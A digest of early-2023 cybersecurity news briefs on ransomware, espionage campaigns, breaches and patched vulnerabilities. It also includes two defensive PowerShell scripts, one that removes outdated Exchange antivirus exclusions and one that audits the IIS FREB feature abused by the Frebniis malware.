    Taiwan Suspects Chinese Ships Cut Islands’ Internet Cables

    Matsu, an outlying island close to neighboring China, relies on two undersea cables to provide Internet to its 14,000 residents. In the past five years, the island has seen its Internet cables cut 27 times. Residents have struggled with paying electricity bills, making doctor's appointments, and receiving packages due to the repeated destruction of their Internet backbone.

    New Malware Variant has “Radio Silence” Mode to Evade Detection

    The Sharp Panda cyber-espionage hacking group is targeting high-profile government entities in Vietnam, Thailand, and Indonesia with a new version of the ‘Soul’ malware framework. The particular malware was previously seen in espionage campaigns targeting critical Southeast Asian organizations, attributed to various Chinese APTs.

    Russian Disinformation Campaign Records High-Profile Individuals on Camera

    Researchers at Proofpoint have discovered Russian-aligned hackers known as TA499 targeting individuals and organizations through video call requests. TA499 lures prominent business people and individuals who have supported Ukrainian humanitarian efforts or have criticized the Russian government. The threat actors send fake video conferencing invitations that appear legitimate. The attacks primarily focus on organizations in the United States and Europe.

    Publicity Stunt: Criminals Dump 2 Million Free Payment Cards

    Last week, the credit card market BidenCash, which sells compromised payment card data, released free details of 2 million payment cards. The market for carders - aka credit and debit card thieves - trumpets that the release is intended to celebrate its first anniversary. Whether actual fraudsters find that data dump useful is questionable: the payment cards included in the mess are nearing expiration or are likely already rendered useless by a security alert. BidenCash's leak is more akin to a free food sample you get on a toothpick at the grocery store than a genuine freebie.

    Nvidia Working on Driver Fix for Windows BSOD, High CPU Usage

    Nvidia confirmed today that it's working to fix a driver issue causing high CPU usage and blue screens of death (BSODs) on Windows systems. The buggy driver is the GeForce Game Ready 531.18 WHQL driver released on February 28th that introduced support for RTX Video Super Resolution. This comes after customers have been complaining for days on the company's forums and on social media that the Nvidia Game Session Telemetry Plugin (NvGSTPlugin.dll) loaded by the Nvidia Display Container service leads to CPU spikes of 10% or more on Windows systems after closing games or rendering apps. In the Nvidia forum thread asking for feedback on this driver version, users are also reporting experiencing constant blue screens on up-to-date Windows installations and that reverting to an older driver version fixes the BSOD problems.

    Old Windows ‘Mock Folders’ UAC Bypass Used to Drop Malware

    A new phishing campaign targets organizations in Eastern European countries with the Remcos RAT malware, aided by an old Windows User Account Control (UAC) bypass discovered over two years ago. The use of mock trusted directories to bypass Windows User Account Control stands out in the attack, as it has been known since 2020 but remains effective today.

    Vulnerability in DJI Drones May Reveal Pilot’s Location

    Serious security vulnerabilities have been identified in multiple DJI drones. These weaknesses had the potential to allow users to modify crucial drone identification details such as its serial number and even bypass security mechanisms that enable authorities to track both the drone and its pilot. In special attack scenarios, the drones could even be brought down remotely in flight.

    Draytek VPN Routers Hacked With New Malware to Steal Data, Evade Detection

    An ongoing hacking campaign called 'Hiatus' targets DrayTek Vigor router models 2960 and 3900 to steal data from victims and build a covert proxy network. DrayTek Vigor devices are business-class VPN routers used by small to medium-size organizations for remote connectivity to corporate networks. The new hacking campaign, which started in July 2022 and is still ongoing, relies on three components: a malicious bash script, a malware named "HiatusRAT," and the legitimate 'tcpdump' utility, used to capture network traffic flowing over the router.

    How to Prevent Microsoft OneNote Files from Infecting Windows with Malware

    The Microsoft OneNote file format has become popular with hackers for spreading malware and breaching corporate networks. Threat actors had previously abused macros in Microsoft Word and Excel, but after Microsoft disabled macros by default, threat actors turned towards other file formats to distribute malware. ISO files and password-protected ZIP archives became popular choices.

    CISA Warns That Royal Ransomware Is Picking Up Steam

    The Royal ransomware group targeting critical infrastructure in the United States and other countries is made up of experienced ransomware attackers and has strong similarities to Conti, the infamous Russia-linked hacking group, according to a new alert issued by U.S. authorities. The group is targeting major industries including manufacturing, communications, education and healthcare organizations in the U.S. and other countries, according to a joint advisory from the U.S. Cybersecurity and Infrastructure Security Agency and the FBI. The attackers appear to be particularly interested in hitting the U.S. healthcare sector, demanding ransoms from $250,000 to over $2 million.

    US Government Orders States to Conduct Cyber Security Audits of Public Water Systems

    The Biden administration announced on Friday that it will make it mandatory for states to conduct cyber security audits of public water systems. Water systems are critical infrastructures that are increasingly exposed to the risk of cyberattacks by both cybercriminal organizations and nation-state actors, the US Environmental Protection Agency reported. “Cyberattacks against critical infrastructure facilities, including drinking water systems, are increasing, and public water systems are vulnerable,” said EPA Assistant Administrator Radhika Fox, as reported by the Associated Press. “Cyberattacks have the potential to contaminate drinking water.”

    Phishing Campaign Targets Job Seekers, Employers

    The phishing campaigns target job seekers by sending emails that purport to belong to a recruitment agency, asking them to provide personal information or login credentials. The malware campaign attempts to drop prominent malware like AgentTesla, Emotet, Cryxos Trojans and Nemucod on victims' devices. Trellix researchers also observed that attackers are posing as job seekers to target employers.

    Hatch Bank Discloses Data Breach After GoAnywhere MFT Hack

    Fintech banking platform Hatch Bank has reported a data breach after hackers stole the personal information of almost 140,000 customers from the company's Fortra GoAnywhere MFT secure file-sharing platform. Hatch Bank is a financial technology firm allowing small businesses to access bank services from other financial institutions.

    Over 71k Impacted by Credential Stuffing Attacks on Chick-fil-A Accounts

    American fast food restaurant chain Chick-fil-A has started notifying roughly 71,000 individuals that their user accounts have been compromised in a two-month-long credential stuffing campaign. In a notification letter to impacted customers, a copy of which was submitted to multiple Attorney General offices, Chick-fil-A says the accounts were compromised in a series of automated attacks targeting both its website and mobile application.

    Microsoft Releases Windows Security Updates for Intel CPU Flaws

    Microsoft has released out-of-band security updates for 'Memory Mapped I/O Stale Data (MMIO)' information disclosure vulnerabilities in Intel CPUs. The MMIO side-channel vulnerabilities were initially disclosed by Intel on June 14th, 2022, with a warning that the flaws could allow processes running in a virtual machine to access data from another virtual machine.

    Investment Scam Network Relies on Massive IT Infrastructure

    Security researchers uncovered an investment scam network that draws on an online infrastructure of hundreds of hosts and thousands of domains to target primarily Indian victims by impersonating Fortune 100 companies. Resecurity dubs the criminal group behind the fraud "Digital Smoke" and says it targeted victims across the globe but focused on India; in 2022, the researchers say, the group took tens of billions of dollars from victims, and there has been a notable uptick in damages in the first months of this year. Digital Smoke used more than 350 hosting providers, and most domain names and hosting platforms were registered via the Chinese company Alibaba.

    Trezor Warns of Massive Crypto Wallet Phishing Campaign

    Trezor is a hardware cryptocurrency wallet where users can store their crypto offline rather than through cloud-based wallets on their devices. Trezor is a tempting alternative to those who'd rather not have their crypto wallet connected to their PC to avoid malware and compromised devices. However, an ongoing phishing campaign masquerading as Trezor data breach notifications attempts to steal users' cryptocurrency and wallets.

    Cisco Patches Critical Web UI RCE Flaw in Multiple IP Phones

    Cisco recently addressed several vulnerabilities impacting its IP phones which could enable unauthenticated remote threat actors to execute arbitrary code or cause a denial of service condition. The most severe of the flaws is tracked as CVE-2023-20078 and can allow an unauthenticated, remote attacker to inject arbitrary commands that are executed with root privileges.

    Russian Government Bans Foreign Messaging Apps

    Russian government officials will no longer be able to use messaging apps developed and run by foreign companies, according to a new law which went into effect yesterday. Parts 8–10 of Article 10 of the new law – On Information, Information Technologies and Information Protection – apply to government agencies and organizations. “The law establishes a ban for a number of Russian organizations on the use of foreign messengers (information systems and computer programs owned by foreign persons that are designed and (or) used for exchanging messages exclusively between their users, in which the sender determines the recipients of messages and does not provide for placement by internet users publicly available information on the internet),” said regulator Roskomnadzor.

    Dish Network Confirms Ransomware Attack Behind Multi-Day Outage

    The satellite broadcaster Dish Network experienced a multi-day network outage. The outage affected multiple services provided by Dish Network, such as Dish[.]com, the Dish Anywhere app, Boost Mobile, and other websites owned and operated by the provider. At first, Dish Network suspected that the cause of the outage was VPN issues.

    Bitdefender Releases Free Decryptor for MortalKombat Ransomware Strain

    Romanian cybersecurity company Bitdefender has released a free universal decryptor for a nascent file-encrypting malware known as MortalKombat. MortalKombat is a new ransomware strain that emerged in January 2023. It's based on a commodity ransomware dubbed Xorist and has been observed in attacks targeting entities in the U.S., the Philippines, the U.K., and Turkey. Xorist, detected since 2010, is distributed as a ransomware builder, allowing cyber threat actors to create and customize their own version of the malware. This includes the ransom note, the file name of the ransom note, the list of file extensions targeted, the wallpaper to be used, and the extension to be used on encrypted files.

    CISA Warns of Hackers Exploiting ZK Java Framework RCE Flaw

    CISA recently added a new vulnerability to its “Known Exploited Vulnerabilities Catalog.” Tracked as CVE-2022-36537 (CVSS 7.5), the vulnerability was discovered last year by Markus Wulftange and is related to a remote code execution flaw impacting the ZK Framework versions 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1.

    Healthcare Most Hit by Ransomware Last Year, FBI Finds

    Last year, the FBI's Internet Crime Complaint Center received 870 complaints that "indicated organizations belonging to a critical infrastructure sector were victims of a ransomware attack," said David Scott, deputy assistant director of the FBI's Cyber Division, speaking at the Futurescot conference Monday in Glasgow, Scotland. Critical manufacturing and the government, including schools, followed healthcare as the most-attacked sectors, IC3 data shows. The top strain of observed ransomware was LockBit, followed by BlackCat and Hive, IC3 found. "That's just a small portion of the overall ransomware attacks; there are many, many more that didn't impact critical infrastructure," Scott said.

    New Exfiltrator-22 Post-exploitation Kit Linked to Lockbit Ransomware

    Threat actors are promoting a new 'Exfiltrator-22' post-exploitation framework designed to spread ransomware in corporate networks while evading detection. Threat analysts at CYFIRMA claim that this new framework was created by former Lockbit 3.0 affiliates who are experts in anti-analysis and defense evasion, offering a robust solution in exchange for a subscription fee. The prices for Exfiltrator-22 range between $1,000 per month and $5,000 for lifetime access, offering continuous updates and support. Buyers of the framework are given an admin panel hosted on a bulletproof VPS (virtual private server) from where they can control the framework's malware and issue commands to compromised systems.

    Critical Flaws in WordPress Houzez Theme Exploited to Hijack Websites

    Hackers are actively exploiting two critical-severity vulnerabilities in the Houzez theme and plugin for WordPress, two premium add-ons used primarily in real estate websites. The Houzez theme is a premium plugin that costs $69, offering easy listing management and a smooth customer experience. The vendor's site claims it is serving over 35,000 customers in the real estate industry. The two vulnerabilities were discovered by Patchstack's threat researcher Dave Jong and reported to the theme's vendor, 'ThemeForest,' with one flaw fixed in version 2.6.4 (August 2022) and the other in version 2.7.2 (November 2022). However, a new Patchstack report warns that some websites have not applied the security update, and threat actors actively exploit these older flaws in ongoing attacks.

    U.S. Marshals Service Investigating Ransomware Attack, Data Theft

    On February 17, the U.S. Marshals Service suffered a ransomware and data exfiltration event affecting a stand-alone USMS system. The USMS bureau is a federal law enforcement agency operated within the Justice Department. The agency supports all elements of the Federal justice system by providing security for the Federal court facilities, executing federal court orders, apprehending criminals, assuring the safety of government witnesses and their families, and more.

    LastPass: Incident 2 – Additional Attack Details

    LastPass revealed more information on a "coordinated second attack," where a threat actor accessed and stole data from the Amazon AWS cloud storage servers for over two months. LastPass disclosed a breach in December where threat actors stole partially encrypted password vault data and customer information: “The threat actor then exported the native corporate vault entries and content of shared folders, which contained encrypted secure notes with access and decryption keys needed to access the AWS S3 LastPass production backups, other cloud-based storage resources, and some related critical database backups.”

    Phone Attacks and MFA Bypass Drive Phishing in 2022

    Security researchers have recorded a 76% year-on-year (YoY) increase in financial losses stemming from phishing attacks, as sophisticated tactics and user knowledge gaps give threat actors the upper hand. Proofpoint compiled its 2023 State of the Phish report from interviews with 7500 consumers and 1050 IT security professionals across 15 countries, as well as 135 million simulated phishing attacks and over 18 million emails reported by customer end users over the past year.

    News Corp Says State Hackers Were on Its Network for Two Years

    Mass media and publishing giant News Corporation (News Corp) says that attackers behind a breach disclosed in 2022 first gained access to its systems two years before, in February 2020. This was revealed in data breach notification letters sent to employees affected by the data breach, who had some of their personal and health information accessed, while the threat actors had access to an email and document storage system used by several News Corp businesses. The incident affected multiple news arms of the publishing conglomerate, including The Wall Street Journal, the New York Post, and its U.K. news operations.

    PureCrypter Malware Hits Govt Orgs With Ransomware, Info-Stealers

    A threat actor has been targeting government entities with the PureCrypter malware downloader, which has been seen delivering multiple information stealers and ransomware strains. Researchers at Menlo Security discovered that the threat actor used Discord to host the initial payload and compromised a non-profit organization to store additional hosts used in the campaign. ‘The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware,’ the researchers say. According to the researchers, the observed PureCrypter campaign targeted multiple government organizations in the Asia-Pacific (APAC) and North America regions.

    Ukraine Finds 2-Year-Old Russian Backdoor

    Russian hackers breached and modified several Ukrainian state websites on Thursday morning using a backdoor planted nearly two years ago. The incident did not cause significant disruption, says the State Service of Special Communications and Information Protection of Ukraine. But discovery of an encrypted web shell created no later than Dec. 23, 2021, hiding on the server of an official website led to an investigation revealing several additional backdoors.

    Dozens of Malicious 'HTTP' Libraries Found on PyPI

    Numerous malicious libraries were discovered by researchers at ReversingLabs on the Python PyPI repository. According to an advisory published Wednesday by Lucija Valentic, a software threat researcher at ReversingLabs, most of the discovered files were malicious packages posing as HTTP libraries. "The descriptions for these packages, for the most part, don't hint at their malicious intent," Valentic explained. "Some are disguised as real libraries and make flattering comparisons between their capabilities and those of known, legitimate HTTP libraries." In particular, ReversingLabs spotted 41 malicious PyPI packages, which the security researchers divided into two types.

    Ukraine Says Russian Hackers Backdoored Govt Websites in 2021

    The Computer Emergency Response Team of Ukraine (CERT-UA) says Russian state hackers have breached multiple government websites this week using backdoors planted as far back as December 2021. CERT-UA spotted the attacks after discovering a web shell on Thursday morning on one of the hacked websites that the threat actors (tracked as UAC-0056, Ember Bear, or Lorec53) used to install additional malware. This web shell was created in December 2021 and was used to deploy CredPump, HoaxPen, and HoaxApe backdoors one year ago, in February 2022, according to CERT-UA. The threat actors also used the GOST (Go Simple Tunnel) and the Ngrok tools during the early stages of their attack to deploy the HoaxPen backdoor.

    Telus Investigating Leak of Stolen Source Code, Employee Data

    Canada's second-largest telecom, TELUS, is investigating a potential data breach after a threat actor shared samples online of what appears to be employee data. The threat actor subsequently posted screenshots that apparently show private source code repositories and payroll records held by the company. TELUS has so far not found evidence of corporate or retail customer data being stolen and continues to monitor the potential incident. On February 17, a threat actor put up what they claim to be TELUS' employee list (comprising names and email addresses) for sale on a data breach forum.

    Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

    Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access Manager Plus, ADManager Plus, ADSelfService Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM), are affected by the issue.

    Microsoft Urges Exchange Admins to Remove Some Antivirus Exclusions

    Microsoft says admins should remove some previously recommended antivirus exclusions for Exchange servers to boost the servers' security. As the company explained, exclusions targeting the Temporary ASP.NET Files and Inetsrv folders and the PowerShell and w3wp processes are no longer required, since they no longer affect stability or performance. Admins should instead make a point of scanning these locations and processes, because they are often abused in attacks to deploy malware.
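
    As an added example (not Microsoft's own script), the following PowerShell audits the Microsoft Defender exclusions configured on an Exchange server against the folder and process exclusions Microsoft now says to drop, removes them when run with -Remove, and then scans the two folders. The exact paths are assumptions based on the layout of Microsoft's earlier exclusion guidance; compare them with what Get-MpPreference reports on your server before removing anything.

```powershell
# Added example: find and remove the Exchange antivirus exclusions Microsoft no
# longer recommends, then scan the locations they used to cover.
# Requires an elevated session with the Defender cmdlets available.
# The paths below are assumptions; verify them against Get-MpPreference first.
param(
    [switch]$Remove   # without -Remove the script only reports what it finds
)

# Folder exclusions Microsoft now says to drop (assumed 64-bit CLR layout).
$foldersToDrop = @(
    '%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files',
    '%SystemRoot%\System32\Inetsrv'
)
# Process exclusions Microsoft now says to drop.
$processesToDrop = @(
    '%SystemRoot%\System32\WindowsPowerShell\v1.0\PowerShell.exe',
    '%SystemRoot%\System32\inetsrv\w3wp.exe'
)

# Expand %SystemRoot%-style variables, drop trailing separators and lowercase,
# so that our list and Defender's stored strings compare the same way.
function Get-NormalizedPath([string]$Path) {
    [Environment]::ExpandEnvironmentVariables($Path).TrimEnd('\').ToLowerInvariant()
}

$wantedPaths = $foldersToDrop   | ForEach-Object { Get-NormalizedPath $_ }
$wantedProcs = $processesToDrop | ForEach-Object { Get-NormalizedPath $_ }
# Defender accepts process exclusions as a full path or a bare image name, so
# match 'w3wp.exe' as well as the full path.
$wantedProcLeaves = $wantedProcs | ForEach-Object { [IO.Path]::GetFileName($_) }

$pref = Get-MpPreference

# Keep Defender's original strings (not the normalised copies) so that
# Remove-MpPreference receives exactly what is stored.
$stalePaths = @($pref.ExclusionPath | Where-Object {
    $wantedPaths -contains (Get-NormalizedPath $_)
})
$staleProcs = @($pref.ExclusionProcess | Where-Object {
    $n = Get-NormalizedPath $_
    ($wantedProcs -contains $n) -or ($wantedProcLeaves -contains $n)
})

if (-not $stalePaths -and -not $staleProcs) {
    Write-Host 'No stale Exchange exclusions found.'
    return
}

$stalePaths | ForEach-Object { Write-Host "Stale folder exclusion:  $_" }
$staleProcs | ForEach-Object { Write-Host "Stale process exclusion: $_" }

if (-not $Remove) {
    Write-Host 'Dry run only; re-run with -Remove to delete these exclusions.'
    return
}

if ($stalePaths) { Remove-MpPreference -ExclusionPath    $stalePaths }
if ($staleProcs) { Remove-MpPreference -ExclusionProcess $staleProcs }
Write-Host 'Exclusions removed.'

# The folders were never scanned while excluded, so scan them now rather than
# waiting for the next scheduled scan.
foreach ($folder in $foldersToDrop) {
    $expanded = [Environment]::ExpandEnvironmentVariables($folder)
    if (Test-Path $expanded) {
        Write-Host "Scanning $expanded ..."
        Start-MpScan -ScanType CustomScan -ScanPath $expanded
    }
}
```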

    Clasiopa Hackers Use New Atharvan Malware in Targeted Attacks

    Symantec researchers have been tracking a hacking group dubbed Clasiopa. The threat actors have been targeting entities in the materials research sector by employing a remote access trojan called Atharvan. Currently, there is no indication of an initial access vector. However, Symantec researchers found hints suggesting that Clasiopa uses brute force to gain access to public-facing servers.

    Lazarus Group Using New WinorDLL64 Backdoor to Exfiltrate Sensitive Data

    A new backdoor associated with a malware downloader named Wslink has been discovered, with the tool likely used by the notorious North Korea-aligned Lazarus Group, new findings reveal. The payload, dubbed WinorDLL64 by ESET, is a fully-featured implant that can exfiltrate, overwrite, and delete files; execute PowerShell commands; and obtain comprehensive information about the underlying machine. Its other features comprise listing active sessions, creating and terminating processes, enumerating drives, and compressing directories.

    Fruit Giant Dole Suffers Ransomware Attack Impacting Operations

    Dole Food Company, one of the world's largest producers and distributors of fresh fruit and vegetables, has announced that it is dealing with a ransomware attack that impacted its operations. There are few details at the moment, and the company is currently investigating "the scope of the incident," noting that the impact is limited. The company employs around 38,000 people and has an annual revenue of $6.5 billion. In a statement on its website, Dole says that it has already engaged third-party experts who are helping with the remediation and security of impacted systems.

    Researchers Find Hidden Vulnerabilities in Hundreds of Docker Containers

    Research revealed numerous high-severity and critical vulnerabilities hidden in hundreds of popular container images, downloaded billions of times collectively. This includes high-profile vulnerabilities with publicly known exploits. Some of the hidden vulnerabilities are known to be actively exploited in the wild and are listed in CISA's Known Exploited Vulnerabilities catalog, including CVE-2021-42013, CVE-2021-41773, and CVE-2019-17558.

    NSA Shares Guidance on How to Secure Your Home Network

    The U.S. National Security Agency (NSA) has issued guidance to help remote workers secure their home networks and defend their devices from attacks. The guide published by the Defense Department's intelligence agency on Wednesday includes a long list of recommendations, including a short list of highlights urging teleworkers to ensure their devices and software are up to date.

    New Privilege Escalation Bug Class Found on macOS and iOS

    Researchers have discovered six vulnerabilities on macOS and iOS and a new bug class. The new class of privilege escalation bugs stems from the ForcedEntry attack, which abused a feature of macOS and iOS to distribute Pegasus malware. The bugs include various zero-day vulnerabilities similar to the ones exploited in the previous ForcedEntry attack. They allow bypassing code signing to execute arbitrary code on several platforms, leading to escalation of privileges and sandbox escape on macOS and iOS. The CVSS scores of the vulnerabilities range between 5.1 and 7.1.

    CISA adds IBM Aspera Faspex and Mitel MiVoice to Known Exploited Vulnerabilities Catalog

    CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog: one resides in IBM's Aspera Faspex, and two in Mitel's MiVoice.

    • CVE-2022-47986 is a remote code execution vulnerability in IBM's Aspera Faspex and received a CVSS score of 9.8. A remote attacker can use this vulnerability to execute arbitrary code on the system. The vulnerability is the result of a YAML deserialization issue. Shadowserver researchers have confirmed active exploitation of the vulnerability in the wild.
    • CVE-2022-41223 is a code injection vulnerability found in Mitel’s MiVoice Connect. A proof of concept was released by Assetnote earlier this month, and the vulnerability received a 6.8 CVSS score. Using the vulnerability, attackers with internal network access can execute code within the context of the application.
    • CVE-2022-40765 resides in Mitel’s Edge Gateway component of MiVoice Connect. It allows an authenticated attacker with internal network access to execute commands within the context of the system. This also received a CVSS score of 6.8.

    According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts recommend private organizations also review the Catalog and address the vulnerabilities in their infrastructure.

    Hydrochasma: New Threat Actor Targets Shipping Companies and Medical Labs in Asia

    Shipping companies and medical laboratories in Asia have been the subject of a suspected espionage campaign carried out by a never-before-seen threat actor dubbed Hydrochasma. The activity, which has been ongoing since October 2022, "relies exclusively on publicly available and living-off-the-land tools," Symantec, by Broadcom Software, said in a report shared with The Hacker News. There is no evidence available as yet to determine its origin or affiliation with known threat actors, but the cybersecurity company said the group may have an interest in industry verticals that are involved in COVID-19-related treatments or vaccines.

    VMware Patches Critical Vulnerability in Carbon Black App Control Product

    Yesterday, VMware patched a critical security vulnerability impacting its Carbon Black App Control product. Tracked as CVE-2023-20858 (CVSS score: 9.1), the flaw was discovered and disclosed to VMware by bug bounty hunter Jari Jääskelä (@JJaaskela), and impacts App Control versions 8.7.x, 8.8.x, and 8.9.x. According to VMware, "a malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system."

    Samsung Announces Message Guard Feature to Neutralize Zero-Click Attacks

    Samsung announced the implementation of a new security feature called Message Guard, aimed at protecting users from malicious code that can be installed via zero-click attacks. Zero-click exploits allow attackers to compromise the target device without any user interaction; for example, a threat actor can exploit a zero-day issue simply by sending an image to the victim.

    Norwegian Authorities Seize $5.86 Million From Lazarus Group

    Norwegian authorities confiscated crypto assets worth nearly $5.68 million tied to the 2022 Ronin cryptocurrency bridge hack by North Korean state threat actor Lazarus Group. Norway's National Authority for Investigation and Prosecution of Economic and Environmental Crime - in Norwegian, it's known as the Økokrim - on Thursday revealed it had retrieved a part of the hacked amount from the Ronin attackers, who in March 2022 stole $620 million worth of cryptocurrency.

    HardBit Ransomware Wants Insurance Details to Set the Perfect Price

    The upgraded version of HardBit ransomware attempts to broker a ransom payment covered by its victim's insurance. Once on the victim's system, the threat group drops a note that does not tell the victim how much the hackers want in exchange for the decryption key. Instead, victims get 48 hours to contact the attacker over an open-source, encrypted peer-to-peer messaging app. For companies that hold cyber insurance, the note carries more elaborate instructions. The ransomware group claims that insurance providers advise victims to keep their coverage secret in order to derail negotiations and avoid paying the maximum ransom, leaving the companies to deal with the criminals themselves. The note goes on to argue that if the victim shares its insurance details with HardBit, both sides benefit: knowing the exact coverage, the gang can demand that amount, and the insurer would be obliged to cover it.

    Researchers Discover Numerous Samples of Information Stealer 'Stealc' in the Wild

    A new information stealer called Stealc that's being advertised on the dark web could emerge as a worthy competitor to other malware of its ilk. "The threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on Vidar, Raccoon, Mars, and RedLine stealers," SEKOIA said in a Monday report. The French cybersecurity company said it discovered more than 40 Stealc samples distributed in the wild and 35 active command-and-control (C2) servers, suggesting that the malware is already gaining traction among criminal groups.

    MyloBot Botnet Spreading Rapidly Worldwide: Infecting Over 50,000 Devices Daily

    A sophisticated botnet known as MyloBot has compromised thousands of systems, with most of them located in India, the U.S., Indonesia, and Iran. That's according to new findings from BitSight, which said it's "currently seeing more than 50,000 unique infected systems every day," down from a high of 250,000 unique hosts in 2020. Furthermore, an analysis of MyloBot's infrastructure has found connections to a residential proxy service called BHProxies, indicating that the compromised machines are being used by the latter.

    Frebniis Malware Exploits Microsoft IIS Feature

    Cybersecurity researchers have discovered a new malware that leverages a legitimate feature of Microsoft’s Internet Information Services (IIS) to install a backdoor in targeted systems. According to an advisory published last Thursday by Symantec, the malware, dubbed "Frebniis," was used by a previously unknown threat actor against targets in Taiwan.

    CISA Warns of Windows and iOS Bugs Exploited as Zero-days

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added four security vulnerabilities exploited in attacks as zero-days to its list of bugs known to be abused in the wild. Two of them impact Microsoft products and allow attackers to gain remote code execution (CVE-2023-21823) and escalate privileges (CVE-2023-23376) on unpatched Windows systems by abusing flaws in the Common Log File System Driver and graphics components. A third one (CVE-2023-21715) can be exploited to bypass Microsoft Office macro policies to deliver malicious payloads via untrusted files.

    Hackers Backdoor Microsoft IIS Servers With New Frebniis Malware

    Researchers have discovered a new malware dubbed Frebniis on Microsoft's Internet Information Services. Symantec's Threat Hunter team observed the malware and found an unknown threat actor using it against Taiwan-based targets. In the attacks seen by Symantec, the hackers abuse an IIS feature called Failed Request Event Buffering (FREB), which collects request metadata (IP address, HTTP headers, cookies) to help server admins troubleshoot unexpected HTTP status codes or request processing problems. The malware injects malicious code into a specific function of the DLL that implements FREB (iisfreb.dll), enabling the attacker to intercept and monitor all HTTP POST requests sent to the IIS server. When the malware detects specific HTTP requests from the attacker, it parses the request to determine what commands to execute on the server.
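
    As an added example (not Symantec's detection logic), the following PowerShell audits the FREB surface that this technique depends on: which IIS sites have failed-request tracing enabled, whether the on-disk iisfreb.dll is still Microsoft-signed, and which modules loaded into each w3wp.exe worker are unsigned or live outside the Windows directory. It assumes the WebAdministration module and the standard inetsrv path; because Frebniis patches iisfreb.dll in memory, this is a baseline and hunting aid, not a signature for the malware itself.

```powershell
# Added example: audit the IIS Failed Request Event Buffering (FREB) surface.
# Run in an elevated session on the IIS host. The module name and inetsrv path
# are the standard ones and are assumptions for any non-default install.
# Note: an in-memory patch of iisfreb.dll will NOT change the on-disk hash or
# signature checked below; treat the output as a baseline to diff over time.
Import-Module WebAdministration

$inetsrv = Join-Path $env:windir 'System32\inetsrv'
$frebDll = Join-Path $inetsrv 'iisfreb.dll'

# 1. Which sites have failed-request tracing (the FREB precondition) enabled?
foreach ($site in Get-Website) {
    $filter = "system.applicationHost/sites/site[@name='$($site.Name)']/traceFailedRequestsLogging"
    $cfg = Get-WebConfiguration -PSPath 'MACHINE/WEBROOT/APPHOST' -Filter $filter
    $state = if ($cfg -and $cfg.enabled) { 'ENABLED' } else { 'disabled' }
    Write-Host ("FREB on site '{0}': {1}" -f $site.Name, $state)
}

# 2. Is the on-disk iisfreb.dll still the signed Microsoft binary?
if (Test-Path $frebDll) {
    $sig = Get-AuthenticodeSignature -FilePath $frebDll
    Write-Host ("iisfreb.dll signature: {0} ({1})" -f $sig.Status, $sig.SignerCertificate.Subject)
    Write-Host ("iisfreb.dll SHA-256:   {0}" -f (Get-FileHash -Algorithm SHA256 -Path $frebDll).Hash)
} else {
    Write-Host "iisfreb.dll not found at $frebDll (FREB module not installed?)"
}

# 3. For every worker process, list loaded modules that are unsigned or that
#    live outside the Windows directory. Application DLLs will show up here
#    too, so compare against a known-good baseline rather than alerting on all.
foreach ($w3wp in Get-Process -Name w3wp -ErrorAction SilentlyContinue) {
    $suspect = foreach ($m in $w3wp.Modules) {
        $path = $m.FileName
        if (-not $path) { continue }
        $outsideWindows = -not $path.StartsWith($env:windir, [StringComparison]::OrdinalIgnoreCase)
        $status = (Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue).Status
        if ($outsideWindows -or $status -ne 'Valid') {
            [pscustomobject]@{ Pid = $w3wp.Id; Module = $path; Signature = $status }
        }
    }
    if ($suspect) {
        $suspect | Format-Table -AutoSize
    } else {
        Write-Host "w3wp.exe PID $($w3wp.Id): all modules signed and under $env:windir"
    }
}
```

    Sites with FREB enabled that nobody is actively troubleshooting are the first thing to question; disabling tracing where it is not needed removes the code path the technique relies on.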

    Atlassian Says Recent Data Leak Stems From Third-Party Vendor Hack

    A hacking group known as SiegedSec recently leaked data on Telegram, claiming to have stolen it from Atlassian, a software company based in Australia. "We are leaking thousands of employee records as well as a few building floorplans. These employee records contain email addresses, phone numbers, names, and lots more~!," stated the hackers on Telegram. Shortly after, Atlassian stated that one of its third-party vendors, Envoy, which the company uses for in-office functions, had been breached.

    Fortinet Fixes Critical RCE flaws in FortiNAC and FortiWeb

    Yesterday, Fortinet released security updates to address two critical vulnerabilities in its FortiNAC and FortiWeb products that could enable unauthenticated threat actors to perform arbitrary code or command execution. The first flaw, tracked as CVE-2022-39952 (CVSS 9.8), impacts FortiNAC, a network access control solution that organizations use to gain real-time network visibility, enforce security policies, and detect/mitigate threats.

    New Mirai Malware Variant Infects Linux Devices to Build DDoS Botnet

    A new Mirai botnet variant tracked as ‘V3G4’ targets 13 vulnerabilities in Linux-based servers and IoT devices to use in DDoS (distributed denial of service) attacks. The malware spreads by brute-forcing weak or default telnet/SSH credentials and exploiting hardcoded flaws to perform remote code execution on the target devices. Once a device is breached, the malware infects it and recruits it into its botnet swarm.

    LockBit and Royal Mail Ransomware Negotiation Leaked

    The LockBit ransomware group has published a log of their negotiations with Royal Mail. Royal Mail fell victim to LockBit's attack on January 7, 2023. However, the mail delivery service refused to pay the ransom demand of 65.7 million euros. The conversations display LockBit operators attempting to persuade Royal Mail to pay the ransom by using various techniques.

    Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

    Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines. The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published today. The ads have since been taken down. Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office.

